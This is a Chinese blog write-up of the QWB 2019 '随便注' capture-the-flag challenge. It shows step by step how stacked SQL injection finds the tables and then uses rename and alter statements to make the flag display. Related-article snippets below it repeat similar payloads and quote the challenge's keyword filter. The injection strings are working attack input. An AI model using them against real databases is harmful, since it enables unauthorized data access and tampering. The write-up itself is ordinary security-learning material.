【强网杯2019】随便注

最新推荐文章于 2022-11-30 22:47:20 发布
最新推荐文章于 2022-11-30 22:47:20 发布
阅读量1k 收藏
点赞数 2
分类专栏: Web安全-Sql注入 Web安全-CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927819/article/details/108522193
版权

题目:在这里插入图片描述

由题目信息可得出,采用SQL注入;

首先判断闭合符号,输入1’ 发现报错了,用**#**截断

在这里插入图片描述
那么存在注入漏洞,接下来查询字段数,**1’ order by 3#**发现报错了在这里插入图片描述

**1’ order by 2#**则显示正常,那么字段数为两个;
联合查询1’ union select 1,2#在这里插入图片描述
select,update,…都被过滤掉了;
堆叠注入:又叫多语句注入,就是原本只执行一个sql句,用函数让他可以执行多个sql语句。
我们继续查询数据库:1’;show databases;#在这里插入图片描述
接下来查询字段

在这里插入图片描述
此时发现存在‘1919810931114514’和‘words’这两个字段。

查询这两个字段中的列名:

1’; show columns form ‘words’

在这里插入图片描述

1’; show columns form 1919810931114514
这里要注意使用反引号。

在这里插入图片描述

在这里插入图片描述
发现words里边存在id 和data,flag则在1919810931114514里边,但没法显示出来;(我们要的东西都在words中回显出来了)即我们若想得到flag,就需要:
(1)将字段words换为其他的,如word1
(2)将字段1919810931114514换为words
(3)将列名flag换为id
需要使用alterrename等关键字, 如下:

1’ ; rename tables words to word1 ; rename tables 1919810931114514 to words ; alter table words change flag id varchar(100);#

这样就改变了数据库结构,

1’ or 1=1#

得到flag{37c18514-62c1-4d17-b3e9-72e9876d7d6f}

本题涉及了rename , alter ,这两个关键字:

rename:重命名
alter:变更列

对数据库结构改变的简单语句:

CREATE DATABASE - 创建新数据库
ALTER DATABASE - 修改数据库
CREATE TABLE - 创建新表
ALTER TABLE - 变更(改变)数据库表
DROP TABLE - 删除表
CREATE INDEX - 创建索引(搜索键)
DROP INDEX - 删除索引

Stray.io
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
[强网杯 2019]随便.docx
最新发布
12-18
强网杯 2019】SQL 入详解 SQL 入是一种常见的网络安全漏洞,攻击者通过在输入参数中嵌入恶意的 SQL 代码,从而控制或篡改数据库的行为。在本题中,参赛者面对的就是一道典型的 SQL 入题目。首先,通过尝试...
BMZCTF 强网杯 2019 随便 原理+题解
AAAAAAAAAAAA66的博客
12-20 767
目录 知识点 堆叠入 show语句 mysql预编译 过程 重点 预编译 重命名 总结 知识点 堆叠入 堆叠查询入:堆叠查询可以执行多条SQL语句,语句之间以分号(;)隔开。而堆叠查询入攻击就是利用此特点,在第二条语句中构造自己要执行的语句。 比如: (这样一下就会执行2条命令,与union入有相似的地方,union入可以在一条语句中执行多个操作,而堆叠入可以在一次输入中执行多条语句) ?id=1 ;show database; ...
强网杯2019 随便
BlueDoorZz的博客
07-11 402
没什么好说的,教程一搜一大堆。 这题过滤了select,updata,where等关键字,不能使用常规的方法进行入,可以考虑堆叠入。 查表名:1';show tables;# 查列名:1';show cloumns from XXXX;# 查看flag有两种方式: 一 1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `fla
【BUUCTF】强网杯 2019随便1 write up
GZWZ_的博客
04-06 4818
回显flag有好几种方法,但我只会一种┭┮﹏┭┮,如果有大佬会其他的,可不可以call我呢
[CTF]强网杯2019随便
凉水的博客
10-16 324
简介 对安全有兴趣,BUUCTF上一道一道做,记一些有意思的东西。 关键点 1 发现入点 这题很容易实验,最简单的1’ or 1之类的语句可以测出来,闭环单引号就可以。 #释符号,如果没起作用,需要意使用url编码。 2 PHP的防入 发现可以随便之后,试了union select之类的,也面提示: return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 搜了一圈,没发现可以绕过的方法。 然后尝试多语句
[强网杯 2019]随便
m0_56691564的博客
11-30 2680
该题作者在页面就查了这两个字段的内容,由于该题禁用select,因此我们可以用作者原本设定的查表函数来帮我们查我们想要查找的内容。用rename把words表改名为其他的表名,把 1919810931114514表的名字改为words,给words表添加新的列名id,将flag改名为data。大意应该是过滤了select,绕过一下,好的发现绕过不了,不管是编码还是释都不行,因此这个题使用堆叠入。由show的作用可知,words表内就两个字段,一个叫id,一个叫data。
强网杯 2019 随便
Misaka10046的博客
07-05 253
首先尝试直接去入,发现好像并没有什么用 尝试使用union盲,preg_match() 函数可以根据正则表达式对字符串进行搜索匹配,发现全被禁了,所以排除union入 使用show,发现可以查看表名 使用desc指令分别去查看这两个表结构的详细信息,这里1919810931114514这个表名必须要使用括起来。 因为发现这里过滤了很多函数,因此考虑怎么去绕过。 这里采用了预处理的语句。先把 select * from ` 1919810931114514 `,通过16进制编码变成一串数字
(转载)强网杯2019 随便
yingyugo的博客
11-24 219
虽然题目做得不多但是工具这题考察的知识面很广 尝试入: 1,测试 1’ or 1=1 # ,初步判定存在SQL入。 1' or 1=1 # 再测试字段数,到3时报错,说明字段数为2. 1' order by 1 # 接着尝试union入,回显了过滤的关键字。 1’ union select 1,2# 然后就是今天学会的新姿势“堆叠入”了。 原理很简单,就是通过 ; 号入多条SQL语句。 先通过show databases爆出数据库。 0'; show databases; # 然后
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
[强网杯 2019]随便 1
tomatoff的博客
03-14 2830
1、登录页面: 2、直接提交1: 3、提交1’: 4、提交1": 5、由输入为1’时报错,所以猜测结果语句应该为单引号闭合; 所以提交a’ or ‘1’=‘1,获得: 6、后面不太会了,参考了大佬的文章: [强网杯2019]随便(初学者看过来) 7、先学习下再补充自己的理解 ...
buuoj强网杯2019随便
qq_43619533的博客
12-07 1614
buuoj强网杯2019随便 打开环境: 查看源码: 说明sqlmap行不通。 返回页面 依次输入: 1 1' 1' # 1’ order by 2 # 发现可以正常显示,入题,并且爆出了字段数。 输入select return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 过滤掉了这些...
强网杯 WriteUp By Nu1L
08-02
强网杯 WriteUp By Nu1L》是关于2022年第六届“强网杯”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
强网杯2021 Web.zip
12-17
【标题】:“强网杯2021 Web.zip”是一个与网络安全竞赛相关的压缩文件,名为“强网杯”,这通常是指“强网杯”网络安全技能大赛。该比赛是中国最高级别的网络安全竞赛之一,旨在提高参赛者的网络防御和攻防能力,...
2019 第三届强网杯线上赛.zip
12-17
强网杯
宽字节入详解
qq_45927819的博客
03-26 1万+
文章目录1、涉及函数2、原理分析3、实战南邮nctf-sql injection 3sql-labs-32关 1、涉及函数 addslashes() 函数返回在预定义字符之前添加反斜杠的字符串 mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符 mysql_escape_string() 转义一个字符串 2、原理分析 先了解一下什么是窄、宽字节已经常见宽字节编码: 当某字符的大小为一个字节时,称其字符为窄字节. 当某字符的大小为两个字节时,称
堆叠入原理解析
qq_45927819的博客
03-19 7802
文章目录一、堆叠入原理二、堆叠入触发条件三、题目 一、堆叠入原理 mysql数据库sql语句的默认结束符是以;结尾,在执行多条SQL语句时就要使用结束符隔开,那么在;结束一条sql语句后继续构造下一条语句,是否会一起执行? 因此这个想法也就造就了堆叠入 二、堆叠入触发条件 堆叠入触发的条件很苛刻,因为堆叠入原理就是通过结束符同时执行多条sql语句,这就需要服务器在访问数据端时使用的是可同时执行多条sql语句的方法,例如php中的mysqli_multi_query函数。但与之相对应的mysql
sql入—布尔盲
qq_45927819的博客
06-25 1262
文章目录布尔盲原理sqli-labs-less8burpsuite爆破数据库名(一)burpsuite爆破数据库名(二) 盲入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL入。 布尔盲 原理 入的时候只会返回True和False,所以布尔盲就是根据页面显示的是True还是False进行猜测数据库中的信息。 布尔盲需要几个函数的辅助,就先来了解一下这几个函数 length()函数可返回字符串的长度 substring()函数可以截取字符串,可指定开始的位置和
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值